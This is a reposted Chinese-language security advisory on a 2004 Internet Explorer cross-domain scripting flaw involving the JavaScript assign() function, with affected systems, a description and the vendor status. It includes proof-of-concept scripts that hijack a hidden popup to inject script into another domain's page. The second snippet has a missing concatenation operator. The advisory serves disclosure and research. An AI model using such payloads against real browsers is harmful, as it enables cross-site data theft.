Microsoft IE JavaScript assign()函数跨站脚本…

2008-04-09 04:26:50来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Microsoft IE JavaScript assign()函数跨站脚本漏洞

发布日期:2004-07-12
更新日期:2004-07-16

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 2003 Web Edition
- Microsoft Windows 2003 Standard Edition
- Microsoft Windows 2003 Enterprise Edition 64-bit
- Microsoft Windows 2003 Enterprise Edition
- Microsoft Windows 2003 Datacenter Edition 64-bit
- Microsoft Windows 2003 Datacenter Edition
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ ID: 10689

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer存在一个安全问题,远程攻击者可以利用这个漏洞允许跨域脚本执行。

当JavaScript函数以相同名指派给另一个函数时,可在浏览器中绕过安全检查,这可导致脚本代码访问其他域,造成敏感信息泄露。

<*来源:Paul (heatsync@gmail.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108975058507726&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Paul (paul@greyhats.cjb.net)提供了如下测试方法:

<script>
//courtesy of Paul
function govuln(){
var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:document.innerHTML=&quot;<title>Microsoft Corporation</title>0wned&quot;');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000");
w.location.assign=location.assign;
location.href="http://www.microsoft.com";
}
govuln()
</script>

The following example was provided:

<script>;
var var1=location.assign;
alert("Assign function of the current window:\n" var1);
var w=window.open("about:blank","_blank");
var var2=w.location.assign;
var w=alert("Assign function of the new window:\n" var2);
w.close();
</script>;

或者可以参看如下地址:

http://freehost07.websamba.com/greyhats/similarmethodnameredir.htm

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft IE Javascript NULL指针异常拒绝服务漏洞

下一篇:Linux Kernel Equalizer Load Balancer Device Driver本地拒绝服